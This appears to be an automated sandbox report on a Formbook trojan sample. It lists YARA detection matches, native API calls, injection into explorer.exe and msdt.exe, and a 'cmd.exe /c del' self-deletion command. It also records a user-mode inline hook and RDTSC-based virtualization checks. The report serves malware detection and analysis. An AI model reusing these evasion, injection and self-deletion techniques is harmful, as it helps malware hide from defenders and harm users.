Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A81030 0_2_00A81030
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9E866 0_2_00A9E866
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9E1F5 0_2_00A9E1F5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D5AD 0_2_00A9D5AD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A82D8E 0_2_00A82D8E
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A82D90 0_2_00A82D90
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9ED31 0_2_00A9ED31
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A89E50 0_2_00A89E50
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A82FB0 0_2_00A82FB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171F900 0_2_0171F900
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D1002 0_2_017D1002
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E28EC 0_2_017E28EC
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E20A8 0_2_017E20A8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B090 0_2_0172B090
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E2B28 0_2_017E2B28
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DDBD2 0_2_017DDBD2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174EBB0 0_2_0174EBB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E22AE 0_2_017E22AE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E1D55 0_2_017E1D55
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01710D20 0_2_01710D20
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E2D07 0_2_017E2D07
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172D5E0 0_2_0172D5E0
Source: C:\Windows\explorer.exe Code function: 1_2_0E173232 1_2_0E173232
Source: C:\Windows\explorer.exe Code function: 1_2_0E16DB32 1_2_0E16DB32
Source: C:\Windows\explorer.exe Code function: 1_2_0E16DB30 1_2_0E16DB30
Source: C:\Windows\explorer.exe Code function: 1_2_0E172036 1_2_0E172036
Source: C:\Windows\explorer.exe Code function: 1_2_0E169082 1_2_0E169082
Source: C:\Windows\explorer.exe Code function: 1_2_0E170912 1_2_0E170912
Source: C:\Windows\explorer.exe Code function: 1_2_0E16AD02 1_2_0E16AD02
Source: C:\Windows\explorer.exe Code function: 1_2_0E1765CD 1_2_0E1765CD
Source: C:\Windows\explorer.exe Code function: 1_2_100D8232 1_2_100D8232
Source: C:\Windows\explorer.exe Code function: 1_2_100D7036 1_2_100D7036
Source: C:\Windows\explorer.exe Code function: 1_2_100CE082 1_2_100CE082
Source: C:\Windows\explorer.exe Code function: 1_2_100CFD02 1_2_100CFD02
Source: C:\Windows\explorer.exe Code function: 1_2_100D5912 1_2_100D5912
Source: C:\Windows\explorer.exe Code function: 1_2_100D2B30 1_2_100D2B30
Source: C:\Windows\explorer.exe Code function: 1_2_100D2B32 1_2_100D2B32
Source: C:\Windows\explorer.exe Code function: 1_2_100DB5CD 1_2_100DB5CD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B920A8 2_2_04B920A8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADB090 2_2_04ADB090
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B928EC 2_2_04B928EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD841F 2_2_04AD841F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81002 2_2_04B81002
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2581 2_2_04AF2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADD5E0 2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B925DD 2_2_04B925DD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC0D20 2_2_04AC0D20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACF900 2_2_04ACF900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B92D07 2_2_04B92D07
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B91D55 2_2_04B91D55
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B922AE 2_2_04B922AE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B92EF7 2_2_04B92EF7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE6E30 2_2_04AE6E30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFEBB0 2_2_04AFEBB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B91FF1 2_2_04B91FF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8DBD2 2_2_04B8DBD2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B92B28 2_2_04B92B28
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E866 2_2_0059E866
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00582D90 2_2_00582D90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00582D8E 2_2_00582D8E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D5AD 2_2_0059D5AD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00589E50 2_2_00589E50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00582FB0 2_2_00582FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 04ACB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A350 NtCreateFile, 0_2_00A9A350
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A480 NtClose, 0_2_00A9A480
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A400 NtReadFile, 0_2_00A9A400
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A530 NtAllocateVirtualMemory, 0_2_00A9A530
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A3FB NtReadFile, 0_2_00A9A3FB
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9A47A NtClose, 0_2_00A9A47A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759910 NtAdjustPrivilegesToken,LdrInitializeThunk, 0_2_01759910
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017599A0 NtCreateSection,LdrInitializeThunk, 0_2_017599A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759860 NtQuerySystemInformation,LdrInitializeThunk, 0_2_01759860
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759840 NtDelayExecution,LdrInitializeThunk, 0_2_01759840
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017598F0 NtReadVirtualMemory,LdrInitializeThunk, 0_2_017598F0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A50 NtCreateFile,LdrInitializeThunk, 0_2_01759A50
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A20 NtResumeThread,LdrInitializeThunk, 0_2_01759A20
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A00 NtProtectVirtualMemory,LdrInitializeThunk, 0_2_01759A00
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759540 NtReadFile,LdrInitializeThunk, 0_2_01759540
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017595D0 NtClose,LdrInitializeThunk, 0_2_017595D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759710 NtQueryInformationToken,LdrInitializeThunk, 0_2_01759710
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017597A0 NtUnmapViewOfSection,LdrInitializeThunk, 0_2_017597A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759780 NtMapViewOfSection,LdrInitializeThunk, 0_2_01759780
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759660 NtAllocateVirtualMemory,LdrInitializeThunk, 0_2_01759660
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017596E0 NtFreeVirtualMemory,LdrInitializeThunk, 0_2_017596E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759950 NtQueueApcThread, 0_2_01759950
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017599D0 NtCreateProcessEx, 0_2_017599D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175B040 NtSuspendThread, 0_2_0175B040
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759820 NtEnumerateKey, 0_2_01759820
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017598A0 NtWriteVirtualMemory, 0_2_017598A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759B00 NtSetValueKey, 0_2_01759B00
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175A3B0 NtGetContextThread, 0_2_0175A3B0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A10 NtQuerySection, 0_2_01759A10
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759A80 NtOpenDirectoryObject, 0_2_01759A80
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759560 NtWriteFile, 0_2_01759560
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175AD30 NtSetContextThread, 0_2_0175AD30
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01759520 NtWaitForSingleObject, 0_2_01759520
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017595F0 NtQueryInformationFile, 0_2_017595F0
Source: C:\Windows\explorer.exe Code function: 1_2_100D9E12 NtProtectVirtualMemory, 1_2_100D9E12
Source: C:\Windows\explorer.exe Code function: 1_2_100D8232 NtCreateFile, 1_2_100D8232
Source: C:\Windows\explorer.exe Code function: 1_2_100D9E0A NtProtectVirtualMemory, 1_2_100D9E0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_04B09860
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09840 NtDelayExecution,LdrInitializeThunk, 2_2_04B09840
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B099A0 NtCreateSection,LdrInitializeThunk, 2_2_04B099A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B095D0 NtClose,LdrInitializeThunk, 2_2_04B095D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_04B09910
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09540 NtReadFile,LdrInitializeThunk, 2_2_04B09540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_04B096E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B096D0 NtCreateKey,LdrInitializeThunk, 2_2_04B096D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_04B09660
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09650 NtQueryValueKey,LdrInitializeThunk, 2_2_04B09650
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A50 NtCreateFile,LdrInitializeThunk, 2_2_04B09A50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09780 NtMapViewOfSection,LdrInitializeThunk, 2_2_04B09780
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09FE0 NtCreateMutant,LdrInitializeThunk, 2_2_04B09FE0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09710 NtQueryInformationToken,LdrInitializeThunk, 2_2_04B09710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B098A0 NtWriteVirtualMemory, 2_2_04B098A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B098F0 NtReadVirtualMemory, 2_2_04B098F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09820 NtEnumerateKey, 2_2_04B09820
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0B040 NtSuspendThread, 2_2_04B0B040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B095F0 NtQueryInformationFile, 2_2_04B095F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B099D0 NtCreateProcessEx, 2_2_04B099D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0AD30 NtSetContextThread, 2_2_04B0AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09520 NtWaitForSingleObject, 2_2_04B09520
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09560 NtWriteFile, 2_2_04B09560
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09950 NtQueueApcThread, 2_2_04B09950
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A80 NtOpenDirectoryObject, 2_2_04B09A80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A20 NtResumeThread, 2_2_04B09A20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09610 NtEnumerateValueKey, 2_2_04B09610
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A10 NtQuerySection, 2_2_04B09A10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09A00 NtProtectVirtualMemory, 2_2_04B09A00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09670 NtQueryInformationProcess, 2_2_04B09670
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0A3B0 NtGetContextThread, 2_2_04B0A3B0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B097A0 NtUnmapViewOfSection, 2_2_04B097A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09730 NtQueryVirtualMemory, 2_2_04B09730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0A710 NtOpenProcessToken, 2_2_04B0A710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09B00 NtSetValueKey, 2_2_04B09B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09770 NtSetInformationFile, 2_2_04B09770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0A770 NtOpenThread, 2_2_04B0A770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B09760 NtOpenProcess, 2_2_04B09760
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A350 NtCreateFile, 2_2_0059A350
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A400 NtReadFile, 2_2_0059A400
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A480 NtClose, 2_2_0059A480
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A530 NtAllocateVirtualMemory, 2_2_0059A530
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A3FB NtReadFile, 2_2_0059A3FB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059A47A NtClose, 2_2_0059A47A
PE file does not import any functions
Source: 7pECKdsaig.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000199F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000167C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 7pECKdsaig.exe Static PE information: Section .text
Source: 7pECKdsaig.exe ReversingLabs: Detection: 76%
Source: 7pECKdsaig.exe Virustotal: Detection: 59%
Source: 7pECKdsaig.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\7pECKdsaig.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\7pECKdsaig.exe C:\Users\user\Desktop\7pECKdsaig.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@6/1@4/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 7pECKdsaig.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9798E push cs; retf 0_2_00A979AB
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9719C push esp; retf 0_2_00A971D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A979D3 push esi; ret 0_2_00A979F3
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A96911 push edi; ret 0_2_00A96912
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9F110 push ecx; ret 0_2_00A9F125
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4A5 push eax; ret 0_2_00A9D4F8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4FB push eax; ret 0_2_00A9D562
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4F2 push eax; ret 0_2_00A9D4F8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D55C push eax; ret 0_2_00A9D562
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0176D0D1 push ecx; ret 0_2_0176D0E4
Source: C:\Windows\explorer.exe Code function: 1_2_0E176B1E push esp; retn 0000h 1_2_0E176B1F
Source: C:\Windows\explorer.exe Code function: 1_2_0E176B02 push esp; retn 0000h 1_2_0E176B03
Source: C:\Windows\explorer.exe Code function: 1_2_0E1769B5 push esp; retn 0000h 1_2_0E176AE7
Source: C:\Windows\explorer.exe Code function: 1_2_100DBB02 push esp; retn 0000h 1_2_100DBB03
Source: C:\Windows\explorer.exe Code function: 1_2_100DBB1E push esp; retn 0000h 1_2_100DBB1F
Source: C:\Windows\explorer.exe Code function: 1_2_100DB9B5 push esp; retn 0000h 1_2_100DBAE7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B1D0D1 push ecx; ret 2_2_04B1D0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E158 push 150B24F0h; iretd 2_2_0059E15F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059F11E push ecx; ret 2_2_0059F125
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00596911 push edi; ret 2_2_00596912
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_005979D3 push esi; ret 2_2_005979F3
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059719C push esp; retf 2_2_005971D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059798E push cs; retf 2_2_005979AB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E224 pushfd ; ret 2_2_0059E22A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4FB push eax; ret 2_2_0059D562
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4F2 push eax; ret 2_2_0059D4F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4A5 push eax; ret 2_2_0059D4F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D55C push eax; ret 2_2_0059D562
Source: initial sample Static PE information: section name: .text entropy: 7.409588215160137

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\7pECKdsaig.exe RDTSC instruction interceptor: First address: 0000000000A89904 second address: 0000000000A8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7pECKdsaig.exe RDTSC instruction interceptor: First address: 0000000000A89B6E second address: 0000000000A89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
